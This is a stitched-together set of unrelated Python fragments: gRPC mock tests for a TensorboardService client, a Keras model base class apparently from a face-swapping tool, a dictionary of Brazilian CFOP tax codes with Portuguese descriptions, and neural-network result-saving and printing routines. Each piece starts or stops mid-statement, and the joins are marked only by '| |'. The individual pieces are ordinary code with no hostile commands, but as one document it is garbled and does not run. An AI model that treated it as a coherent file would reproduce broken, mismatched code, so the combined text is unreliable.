request = tensorboard_service.GetTensorboardRunRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
tensorboard_run.TensorboardRun()
)
await client.get_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_tensorboard_run_flattened():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = tensorboard_run.TensorboardRun()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_tensorboard_run(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_tensorboard_run_flattened_error():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_tensorboard_run(
tensorboard_service.GetTensorboardRunRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_tensorboard_run_flattened_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = tensorboard_run.TensorboardRun()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
tensorboard_run.TensorboardRun()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_tensorboard_run(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_tensorboard_run_flattened_error_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_tensorboard_run(
tensorboard_service.GetTensorboardRunRequest(), name="name_value",
)
def test_update_tensorboard_run(
transport: str = "grpc",
request_type=tensorboard_service.UpdateTensorboardRunRequest,
):
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_tensorboard_run.TensorboardRun(
name="name_value",
display_name="display_name_value",
description="description_value",
etag="etag_value",
)
response = client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.UpdateTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
def test_update_tensorboard_run_from_dict():
test_update_tensorboard_run(request_type=dict)
def test_update_tensorboard_run_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
client.update_tensorboard_run()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.UpdateTensorboardRunRequest()
@pytest.mark.asyncio
async def test_update_tensorboard_run_async(
transport: str = "grpc_asyncio",
request_type=tensorboard_service.UpdateTensorboardRunRequest,
):
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_tensorboard_run.TensorboardRun(
name="name_value",
display_name="display_name_value",
description="description_value",
etag="etag_value",
)
)
response = await client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.UpdateTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_update_tensorboard_run_async_from_dict():
await test_update_tensorboard_run_async(request_type=dict)
def test_update_tensorboard_run_field_headers():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.UpdateTensorboardRunRequest()
request.tensorboard_run.name = "tensorboard_run.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
call.return_value = gca_tensorboard_run.TensorboardRun()
client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"tensorboard_run.name=tensorboard_run.name/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_tensorboard_run_field_headers_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.UpdateTensorboardRunRequest()
request.tensorboard_run.name = "tensorboard_run.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_tensorboard_run), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_tensorboard_run.TensorboardRun()
)
await client.update_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"tensorboard_run.name=tensorboard_run.name/value",
) in kw["metadata"]
def test_update_tensorboard_run_flattened():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the | |
#!/usr/bin/env python3
""" Base class for Models. ALL Models should at least inherit from this class
When inheriting model_data should be a list of NNMeta objects.
See the class for details.
"""
import logging
import os
import sys
import time
from json import JSONDecodeError
from shutil import copyfile, copytree
import keras
from keras import losses
from keras import backend as K
from keras.models import load_model, Model
from keras.optimizers import Adam
from keras.utils import get_custom_objects, multi_gpu_model
from lib import Serializer
from lib.model.losses import DSSIMObjective, PenalizedLoss
from lib.model.nn_blocks import NNBlocks
from lib.multithreading import MultiThread
from lib.utils import get_folder
from plugins.train._config import Config
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
_CONFIG = None
class ModelBase():
""" Base class that all models should inherit from """
def __init__(self,
model_dir,
gpus,
no_logs=False,
warp_to_landmarks=False,
no_flip=False,
training_image_size=256,
alignments_paths=None,
preview_scale=100,
input_shape=None,
encoder_dim=None,
trainer="original",
pingpong=False,
memory_saving_gradients=False,
predict=False):
logger.debug("Initializing ModelBase (%s): (model_dir: '%s', gpus: %s, no_logs: %s"
"training_image_size, %s, alignments_paths: %s, preview_scale: %s, "
"input_shape: %s, encoder_dim: %s, trainer: %s, pingpong: %s, "
"memory_saving_gradients: %s, predict: %s)",
self.__class__.__name__, model_dir, gpus, no_logs, training_image_size,
alignments_paths, preview_scale, input_shape, encoder_dim, trainer,
pingpong, memory_saving_gradients, predict)
self.predict = predict
self.model_dir = model_dir
self.gpus = gpus
self.blocks = NNBlocks(use_subpixel=self.config["subpixel_upscaling"],
use_icnr_init=self.config["icnr_init"],
use_reflect_padding=self.config["reflect_padding"])
self.input_shape = input_shape
self.output_shape = None # set after model is compiled
self.encoder_dim = encoder_dim
self.trainer = trainer
self.state = State(self.model_dir,
self.name,
self.config_changeable_items,
no_logs,
pingpong,
training_image_size)
self.is_legacy = False
self.rename_legacy()
self.load_state_info()
self.networks = dict() # Networks for the model
self.predictors = dict() # Predictors for model
self.history = dict() # Loss history per save iteration)
# Training information specific to the model should be placed in this
# dict for reference by the trainer.
self.training_opts = {"alignments": alignments_paths,
"preview_scaling": preview_scale / 100,
"warp_to_landmarks": warp_to_landmarks,
"no_flip": no_flip,
"pingpong": pingpong}
self.set_gradient_type(memory_saving_gradients)
self.build()
self.set_training_data()
logger.debug("Initialized ModelBase (%s)", self.__class__.__name__)
@property
def config_section(self):
""" The section name for loading config """
retval = ".".join(self.__module__.split(".")[-2:])
logger.debug(retval)
return retval
@property
def config(self):
""" Return config dict for current plugin """
global _CONFIG # pylint: disable=global-statement
if not _CONFIG:
model_name = self.config_section
logger.debug("Loading config for: %s", model_name)
_CONFIG = Config(model_name).config_dict
return _CONFIG
@property
def config_changeable_items(self):
""" Return the dict of config items that can be updated after the model
has been created """
return Config(self.config_section).changeable_items
@property
def name(self):
""" Set the model name based on the subclass """
basename = os.path.basename(sys.modules[self.__module__].__file__)
retval = os.path.splitext(basename)[0].lower()
logger.debug("model name: '%s'", retval)
return retval
@property
def models_exist(self):
""" Return if all files exist and clear session """
retval = all([os.path.isfile(model.filename) for model in self.networks.values()])
logger.debug("Pre-existing models exist: %s", retval)
return retval
@staticmethod
def set_gradient_type(memory_saving_gradients):
""" Monkeypatch Memory Saving Gradients if requested """
if not memory_saving_gradients:
return
logger.info("Using Memory Saving Gradients")
from lib.model import memory_saving_gradients
K.__dict__["gradients"] = memory_saving_gradients.gradients_memory
def set_training_data(self):
""" Override to set model specific training data.
super() this method for defaults otherwise be sure to add """
logger.debug("Setting training data")
self.training_opts["training_size"] = self.state.training_size
self.training_opts["no_logs"] = self.state.current_session["no_logs"]
self.training_opts["mask_type"] = self.config.get("mask_type", None)
self.training_opts["coverage_ratio"] = self.calculate_coverage_ratio()
self.training_opts["preview_images"] = 14
logger.debug("Set training data: %s", self.training_opts)
def calculate_coverage_ratio(self):
""" Coverage must be a ratio, leading to a cropped shape divisible by 2 """
coverage_ratio = self.config.get("coverage", 62.5) / 100
logger.debug("Requested coverage_ratio: %s", coverage_ratio)
cropped_size = (self.state.training_size * coverage_ratio) // 2 * 2
coverage_ratio = cropped_size / self.state.training_size
logger.debug("Final coverage_ratio: %s", coverage_ratio)
return coverage_ratio
def build(self):
""" Build the model. Override for custom build methods """
self.add_networks()
self.load_models(swapped=False)
self.build_autoencoders()
self.log_summary()
self.compile_predictors(initialize=True)
def build_autoencoders(self):
""" Override for Model Specific autoencoder builds
NB! ENSURE YOU NAME YOUR INPUTS. At least the following input names
are expected:
face (the input for image)
mask (the input for mask if it is used)
"""
raise NotImplementedError
def add_networks(self):
""" Override to add neural networks """
raise NotImplementedError
def load_state_info(self):
""" Load the input shape from state file if it exists """
logger.debug("Loading Input Shape from State file")
if not self.state.inputs:
logger.debug("No input shapes saved. Using model config")
return
if not self.state.face_shapes:
logger.warning("Input shapes stored in State file, but no matches for 'face'."
"Using model config")
return
input_shape = self.state.face_shapes[0]
logger.debug("Setting input shape from state file: %s", input_shape)
self.input_shape = input_shape
def add_network(self, network_type, side, network):
""" Add a NNMeta object """
logger.debug("network_type: '%s', side: '%s', network: '%s'", network_type, side, network)
filename = "{}_{}".format(self.name, network_type.lower())
name = network_type.lower()
if side:
side = side.lower()
filename += "_{}".format(side.upper())
name += "_{}".format(side)
filename += ".h5"
logger.debug("name: '%s', filename: '%s'", name, filename)
self.networks[name] = NNMeta(str(self.model_dir / filename), network_type, side, network)
def add_predictor(self, side, model):
""" Add a predictor to the predictors dictionary """
logger.debug("Adding predictor: (side: '%s', model: %s)", side, model)
if self.gpus > 1:
logger.debug("Converting to multi-gpu: side %s", side)
model = multi_gpu_model(model, self.gpus)
self.predictors[side] = model
if not self.state.inputs:
self.store_input_shapes(model)
if not self.output_shape:
self.set_output_shape(model)
def store_input_shapes(self, model):
""" Store the input and output shapes to state """
logger.debug("Adding input shapes to state for model")
inputs = {tensor.name: K.int_shape(tensor)[-3:] for tensor in model.inputs}
if not any(inp for inp in inputs.keys() if inp.startswith("face")):
raise ValueError("No input named 'face' was found. Check your input naming. "
"Current input names: {}".format(inputs))
self.state.inputs = inputs
logger.debug("Added input shapes: %s", self.state.inputs)
def set_output_shape(self, model):
""" Set the output shape for use in training and convert """
logger.debug("Setting output shape")
out = [K.int_shape(tensor)[-3:] for tensor in model.outputs]
if not out:
raise ValueError("No outputs found! Check your model.")
self.output_shape = tuple(out[0])
logger.debug("Added output shape: %s", self.output_shape)
def reset_pingpong(self):
""" Reset the models for pingpong training """
logger.debug("Resetting models")
# Clear models and graph
self.predictors = dict()
self.adversarial_autoencoders = dict()
K.clear_session()
# Load Models for current training run
for model in self.networks.values():
model.network = Model.from_config(model.config)
model.network.set_weights(model.weights)
self.build_autoencoders()
self.compile_predictors(initialize=False)
logger.debug("Reset models")
def compile_predictors(self, initialize=True):
""" Compile the predictors """
logger.debug("Compiling Predictors")
learning_rate = self.config.get("learning_rate", 5e-5)
optimizer = self.get_optimizer(lr=learning_rate, beta_1=0.5, beta_2=0.999)
for side, model in self.predictors.items():
mask = [inp for inp in model.inputs if inp.name.startswith("mask")]
loss_names = ["loss"]
loss_funcs = [self.loss_function(mask, side, initialize)]
if mask:
loss_names.append("mask_loss")
loss_funcs.append(self.mask_loss_function(side, initialize))
model.compile(optimizer=optimizer, loss=loss_funcs)
if len(loss_names) > 1:
loss_names.insert(0, "total_loss")
if initialize:
self.state.add_session_loss_names(side, loss_names)
self.history[side] = list()
logger.debug("Compiled Predictors. Losses: %s", loss_names)
def get_optimizer(self, lr=5e-5, beta_1=0.5, beta_2=0.999): # pylint: disable=invalid-name
""" Build and return Optimizer """
opt_kwargs = dict(lr=lr, beta_1=beta_1, beta_2=beta_2)
if (self.config.get("clipnorm", False) and
keras.backend.backend() != "plaidml.keras.backend"):
# NB: Clipnorm is ballooning VRAM useage, which is not expected behaviour
# and may be a bug in Keras/TF.
# PlaidML has a bug regarding the clipnorm parameter
# See: https://github.com/plaidml/plaidml/issues/228
# Workaround by simply removing it.
# TODO: Remove this as soon it is fixed in PlaidML.
opt_kwargs["clipnorm"] = 1.0
logger.debug("Optimizer kwargs: %s", opt_kwargs)
return Adam(**opt_kwargs)
def loss_function(self, mask, side, initialize):
""" Set the loss function
Side is input so we only log once """
if self.config.get("dssim_loss", False):
if side == "a" and not self.predict and initialize:
logger.verbose("Using DSSIM Loss")
loss_func = DSSIMObjective()
else:
if side == "a" and not self.predict and initialize:
logger.verbose("Using Mean Absolute Error Loss")
loss_func = losses.mean_absolute_error
if mask and self.config.get("penalized_mask_loss", False):
loss_mask = mask[0]
if side == "a" and not self.predict and initialize:
logger.verbose("Penalizing mask for Loss")
loss_func = PenalizedLoss(loss_mask, loss_func)
return loss_func
def mask_loss_function(self, side, initialize):
""" Set the mask loss function
Side is input so we only log once """
if side == "a" and not self.predict and initialize:
logger.verbose("Using Mean Squared Error Loss for mask")
mask_loss_func = losses.mean_squared_error
return mask_loss_func
def converter(self, swap):
""" Converter for autoencoder models """
logger.debug("Getting Converter: (swap: %s)", swap)
if swap:
model = self.predictors["a"]
else:
model = self.predictors["b"]
if self.predict:
# Must compile the model to be thread safe
model._make_predict_function() # pylint: disable=protected-access
retval = model.predict
logger.debug("Got Converter: %s", retval)
return retval
@property
def iterations(self):
"Get current training iteration number"
return self.state.iterations
def map_models(self, swapped):
""" Map the models for A/B side for swapping """
logger.debug("Map models: (swapped: %s)", swapped)
models_map = {"a": dict(), "b": dict()}
sides = ("a", "b") if not swapped else ("b", "a")
for network in self.networks.values():
if network.side == sides[0]:
models_map["a"][network.type] = network.filename
if network.side == sides[1]:
models_map["b"][network.type] = network.filename
logger.debug("Mapped models: (models_map: %s)", models_map)
return models_map
def log_summary(self):
""" Verbose log the | |
ordem, já recebida do vendedor remetente',
'2122': 'Compra para industrialização em que a mercadoria foi remetida pelo fornecedor ao industrializador sem transitar pelo estabelecimento adquirente',
'2124': 'Industrialização efetuada por outra empresa',
'2125': 'Industrialização efetuada por outra empresa quando a mercadoria remetida para utilização no processo de industrialização não transitou pelo estabelecimento adquirente da mercadoria',
'2126': 'Compra para utilização na prestação de serviço sujeita ao ICMS',
'2128': 'Compra para utilização na prestação de serviço sujeita ao ISSQN',
'2131': 'Entrada de mercadoria com previsão de posterior ajuste ou fixação de preço, decorrente de operação de ato cooperativo.',
'2132': 'Fixação de preço de produção do estabelecimento produtor, inclusive quando remetidas anteriormente com previsão de posterior ajuste ou fixação de preço, em ato cooperativo, para comercialização.',
'2135': 'Fixação de preço de produção do estabelecimento produtor, inclusive quando remetidas anteriormente com previsão de posterior ajuste ou fixação de preço, em ato cooperativo, para industrialização.',
'2150': 'TRANSFERÊNCIAS PARA INDUSTRIALIZAÇÃO, PRODUÇÃO RURAL, COMERCIALIZAÇÃO OU PRESTAÇÃO DE SERVIÇOS',
'2151': 'Transferência para industrialização ou produção rural',
'2152': 'Transferência para comercialização',
'2153': 'Transferência de energia elétrica para distribuição',
'2154': 'Transferência para utilização na prestação de serviço',
'2159': 'Entrada decorrente do fornecimento de produto ou mercadoria de ato cooperativo',
'2200': 'DEVOLUÇÕES DE VENDAS DE PRODUÇÃO PRÓPRIA, DE TERCEIROS OU ANULAÇÕES DE VALORES',
'2201': 'Devolução de venda de produção do estabelecimento',
'2202': 'Devolução de venda de mercadoria adquirida ou recebida de terceiros',
'2203': 'Devolução de venda de produção do estabelecimento, destinada à Zona Franca de Manaus ou Áreas de Livre Comércio',
'2204': 'Devolução de venda de mercadoria adquirida ou recebida de terceiros, destinada à Zona Franca de Manaus ou Áreas de Livre Comércio',
'2205': 'Anulação de valor relativo à prestação de serviço de comunicação',
'2206': 'Anulação de valor relativo à prestação de serviço de transporte',
'2207': 'Anulação de valor relativo à venda de energia elétrica',
'2208': 'Devolução de produção do estabelecimento, remetida em transferência',
'2209': 'Devolução de mercadoria adquirida ou recebida de terceiros, remetida em transferência',
'2212': 'Devolução de venda no mercado interno de mercadoria industrializada e insumo importado sob o Regime Aduaneiro Especial de Entreposto Industrial sob Controle Informatizado do Sistema Público de Escrituração Digital (Recof-Sped).',
'2213': 'Devolução de remessa de produção do estabelecimento com previsão de posterior ajuste ou fixação de preço, em ato cooperativo.',
'2214': 'Devolução de fixação de preço de produção do estabelecimento produtor, de ato cooperativo.',
'2250': 'COMPRAS DE ENERGIA ELÉTRICA',
'2251': 'Compra de energia elétrica para distribuição ou comercialização',
'2252': 'Compra de energia elétrica por estabelecimento industrial',
'2253': 'Compra de energia elétrica por estabelecimento comercial',
'2254': 'Compra de energia elétrica por estabelecimento prestador de serviço de transporte',
'2255': 'Compra de energia elétrica por estabelecimento prestador de serviço de comunicação',
'2256': 'Compra de energia elétrica por estabelecimento de produtor rural',
'2257': 'Compra de energia elétrica para consumo por demanda contratada',
'2300': 'AQUISIÇÕES DE SERVIÇOS DE COMUNICAÇÃO',
'2301': 'Aquisição de serviço de comunicação para execução de serviço da mesma natureza',
'2302': 'Aquisição de serviço de comunicação por estabelecimento industrial',
'2303': 'Aquisição de serviço de comunicação por estabelecimento comercial',
'2304': 'Aquisição de serviço de comunicação por estabelecimento de prestador de serviço de transporte',
'2305': 'Aquisição de serviço de comunicação por estabelecimento de geradora ou de distribuidora de energia elétrica',
'2306': 'Aquisição de serviço de comunicação por estabelecimento de produtor rural',
'2350': 'AQUISIÇÕES DE SERVIÇOS DE TRANSPORTE',
'2351': 'Aquisição de serviço de transporte para execução de serviço da mesma natureza',
'2352': 'Aquisição de serviço de transporte por estabelecimento industrial',
'2353': 'Aquisição de serviço de transporte por estabelecimento comercial',
'2354': 'Aquisição de serviço de transporte por estabelecimento de prestador de serviço de comunicação',
'2355': 'Aquisição de serviço de transporte por estabelecimento de geradora ou de distribuidora de energia elétrica',
'2356': 'Aquisição de serviço de transporte por estabelecimento de produtor rural',
'2400': 'ENTRADAS DE MERCADORIAS SUJEITAS AO REGIME DE SUBSTITUIÇÃO TRIBUTÁRIA',
'2401': 'Compra para industrialização ou produção rural em operação com mercadoria sujeita ao regime de substituição tributária',
'2403': 'Compra para comercialização em operação com mercadoria sujeita ao regime de substituição tributária',
'2406': 'Compra de bem para o ativo imobilizado cuja mercadoria está sujeita ao regime de substituição tributária',
'2407': 'Compra de mercadoria para uso ou consumo cuja mercadoria está sujeita ao regime de substituição tributária',
'2408': 'Transferência para industrialização ou produção rural em operação com mercadoria sujeita ao regime de substituição tributária',
'2409': 'Transferência para comercialização em operação com mercadoria sujeita ao regime de substituição tributária',
'2410': 'Devolução de venda de produção do estabelecimento em operação com produto sujeito ao regime de substituição tributária',
'2411': 'Devolução de venda de mercadoria adquirida ou recebida de terceiros em operação com mercadoria sujeita ao regime de substituição tributária',
'2414': 'Retorno de produção do estabelecimento, remetida para venda fora do estabelecimento em operação com produto sujeito ao regime de substituição tributária',
'2415': 'Retorno de mercadoria adquirida ou recebida de terceiros, remetida para venda fora do estabelecimento em operação com mercadoria sujeita ao regime de substituição tributária',
'2500': 'ENTRADAS DE MERCADORIAS REMETIDAS PARA FORMAÇÃO DE LOTE OU COM FIM ESPECÍFICO DE EXPORTAÇÃO E EVENTUAIS DEVOLUÇÕES',
'2501': 'Entrada de mercadoria recebida com fim específico de exportação',
'2503': 'Entrada decorrente de devolução de produto remetido com fim específico de exportação, de produção do estabelecimento',
'2504': 'Entrada decorrente de devolução de mercadoria remetida com fim específico de exportação, adquirida ou recebida de terceiros',
'2505': 'Entrada decorrente de devolução de mercadorias remetidas para formação de lote de exportação, de produtos industrializados ou produzidos pelo próprio estabelecimento',
'2506': 'Entrada decorrente de devolução de mercadorias, adquiridas ou recebidas de terceiros, remetidas para formação de lote de exportação',
'2550': 'OPERAÇÕES COM BENS DE ATIVO IMOBILIZADO E MATERIAIS PARA USO OU CONSUMO',
'2551': 'Compra de bem para o ativo imobilizado',
'2552': 'Transferência de bem do ativo imobilizado',
'2553': 'Devolução de venda de bem do ativo imobilizado',
'2554': 'Retorno de bem do ativo imobilizado remetido para uso fora do estabelecimento',
'2555': 'Entrada de bem do ativo imobilizado de terceiro, remetido para uso no estabelecimento',
'2556': 'Compra de material para uso ou consumo',
'2557': 'Transferência de material para uso ou consumo',
'2600': 'CRÉDITOS E RESSARCIMENTOS DE ICMS',
'2603': 'Ressarcimento de ICMS retido por substituição tributária',
'2650': 'ENTRADAS DE COMBUSTÍVEIS, DERIVADOS OU NÃO DE PETRÓLEO E LUBRIFICANTES',
'2651': 'Compra de combustível ou lubrificante para industrialização subseqüente',
'2652': 'Compra de combustível ou lubrificante para comercialização',
'2653': 'Compra de combustível ou lubrificante por consumidor ou usuário final',
'2658': 'Transferência de combustível e lubrificante para industrialização',
'2659': 'Transferência de combustível e lubrificante para comercialização',
'2660': 'Devolução de venda de combustível ou lubrificante destinado à industrialização subseqüente',
'2661': 'Devolução de venda de combustível ou lubrificante destinado à comercialização',
'2662': 'Devolução de venda de combustível ou lubrificante destinado a consumidor ou usuário final',
'2663': 'Entrada de combustível ou lubrificante para armazenagem',
'2664': 'Retorno de combustível ou lubrificante remetido para armazenagem',
'2900': 'OUTRAS ENTRADAS DE MERCADORIAS OU AQUISIÇÕES DE SERVIÇOS',
'2901': 'Entrada para industrialização por encomenda',
'2902': 'Retorno de mercadoria remetida para industrialização por encomenda',
'2903': 'Entrada de mercadoria remetida para industrialização e não aplicada no referido processo',
'2904': 'Retorno de remessa para venda fora do estabelecimento',
'2905': 'Entrada de mercadoria recebida para depósito em depósito fechado ou armazém geral',
'2906': 'Retorno de mercadoria remetida para depósito fechado ou armazém geral',
'2907': 'Retorno simbólico de mercadoria remetida para depósito fechado ou armazém geral',
'2908': 'Entrada de bem por conta de contrato de comodato',
'2909': 'Retorno de bem remetido por conta de contrato de comodato',
'2910': 'Entrada de bonificação, doação ou brinde',
'2911': 'Entrada de amostra grátis',
'2912': 'Entrada de mercadoria ou bem recebido para demonstração ou mostruário.',
'2913': 'Retorno de mercadoria ou bem remetido para demonstração, mostruário ou treinamento.',
'2914': 'Retorno de mercadoria ou bem remetido para exposição ou feira',
'2915': 'Entrada de mercadoria ou bem recebido para conserto ou reparo',
'2916': 'Retorno de mercadoria ou bem remetido para conserto ou reparo',
'2917': 'Entrada de mercadoria recebida em consignação mercantil ou industrial',
'2918': 'Devolução de mercadoria remetida em consignação mercantil ou industrial',
'2919': 'Devolução simbólica de mercadoria vendida ou utilizada em processo industrial, remetida anteriormente em consignação mercantil ou industrial',
'2920': 'Entrada de vasilhame ou sacaria',
'2921': 'Retorno de vasilhame ou sacaria',
'2922': 'Lançamento efetuado a título de simples faturamento decorrente de compra para recebimento futuro',
'2923': 'Entrada de mercadoria recebida do vendedor remetente, em venda à ordem',
'2924': 'Entrada para industrialização por conta e ordem do adquirente da mercadoria, quando esta não transitar pelo estabelecimento do adquirente',
'2925': 'Retorno de mercadoria remetida para industrialização por | |
- len(line))
line_x = list(line)
line_x.extend(temp)
adjusted_weights.append(line_x)
np.savetxt(file_name, np.array(adjusted_weights), delimiter=",", fmt='%.18g')
elif save_type == 1: # All outputs
results, labels = data_to_save
ending = '\n'
try:
file_ann = open(file_name, "a")
except:
file_ann = open(file_name, "w")
now = dt.now()
file_ann.writelines(['======================\n', str(now) + '\n', '======================\n'])
for i, label in enumerate(labels):
crown = '-' * len(label) + '\n'
file_ann.writelines([crown, label + '\n']) # , crown])
if i < 6:
if i == 2: # Epochs errors
epochs = range(1, len(results[i]) + 1)
file_ann.writelines(remove_brackets(epochs) + '\n')
file_ann.writelines(remove_brackets(results[i]) + '\n')
else:
file_ann.writelines(remove_brackets(results[i]) + '\n')
else:
if i != 9:
for res in results[i]:
file_ann.writelines(remove_brackets(res) + '\n')
else:
for w in range(1):
for layer in results[i][w]:
file_ann.writelines(remove_brackets(layer) + '\n')
file_ann.writelines(remove_brackets(results[i][2]) + '\n')
file_ann.writelines(remove_brackets(results[i][3]) + '\n')
file_ann.writelines(ending)
file_ann.close()
elif save_type == 2:
file_ann = open(file_name, "a")
for line in data_to_save:
lne = [x for x in line[0]]
for m in range(1, len(line)):
lne.append(line[m])
clean_line = str(lne)
clean_line = clean_line.replace('[', '')
clean_line = clean_line.replace(']', '')
clean_line = clean_line.replace("'", "")
file_ann.writelines(clean_line + '\n')
file_ann.close()
elif save_type == 3:
file_ann = open(file_name, "a")
reformated = []
tmp = []
for item in range(len(data_to_save)):
tmp.append('Data ' + str(item))
tmp.append('Predicted ' + str(item))
reformated.append(tmp)
for item in range(len(data_to_save[0])):
tmp = []
for var in range(len(data_to_save)):
tmp.append(data_to_save[var][item][0])
tmp.append(data_to_save[var][item][1])
reformated.append(tmp)
for line in reformated:
# lne = [x for x in line[0]]
# for m in range(1, len(line)):
# lne.append(line[m])
clean_line = str(line) # str(lne)
clean_line = clean_line.replace('[', '')
clean_line = clean_line.replace(']', '')
clean_line = clean_line.replace("'", "")
file_ann.writelines(clean_line + '\n')
file_ann.close()
elif save_type == 4:
file_ann = open(file_name, "a")
for line in data_to_save:
clean_line = str(line) # str(lne)
clean_line = clean_line.replace('[', '')
clean_line = clean_line.replace(']', '')
clean_line = clean_line.replace("'", "")
file_ann.writelines(clean_line + '\n')
file_ann.close()
pass
def print_info(self, print_type, r=None):
# ann = self.ann
"""
Prints the required information to console in a formated form
@param print_type: 0: # print_net_weights
1: # print_relative_importance
2: # print_correlation_coefficient
@param r: is the correlation_coefficients (if print_type=2)
"""
if print_type == 0: # print_net_weights
weights_of_i_h, weights_of_h_o, bias_of_i_h, bias_of_h_o = self.get_network_weights()
print_matrix('weights_of_i_h', weights_of_i_h)
print_matrix('bias_of_i_h', bias_of_i_h)
print_matrix('weights_of_h_o', weights_of_h_o)
print_matrix('bias_of_h_o', bias_of_h_o)
elif print_type == 1: # print_relative_importance
re100, re_negative = self.separate_relative_importance()
print
print_matrix('relative_importance (+ve contribution)', re100)
print_matrix('relative_importance (real contribution)', re_negative)
elif print_type == 2: # print_correlation_coefficient
print_matrix('correlation_coefficients', r)
def prepare_output_file(self, error_list, stopping_epoch, tolerance, correlation_coefficients,
matrix_of_sum_of_errors, errors_collection,
relative_importance_100, relative_importance_negative, clear_file_state=True):
"""
To prepare the file bfore printing
@param error_list: a list of cost values per epoch
@param stopping_epoch: the epoch the network converged at
@param tolerance: the registered tollerance that was fulfilled before convergence
@param correlation_coefficients: per input variable
@param matrix_of_sum_of_errors: Total Error, MSE, RMSE
@param errors_collection: Error details: (Total Error; MSE{per output}; RMSE{per output})
@param relative_importance_100: Relative contributions (+ve only):of each input (columns) to each output (rows)
@param relative_importance_negative: Relative contributions (real values): as above
@param clear_file_state: if True(Default), the data will be written to a clean file, else, appended to existing
"""
ann = self.ann
gross_network_results = [ann.get_structure(), ann.get_activation_functions(),
error_list, (stopping_epoch, tolerance), correlation_coefficients,
matrix_of_sum_of_errors, errors_collection,
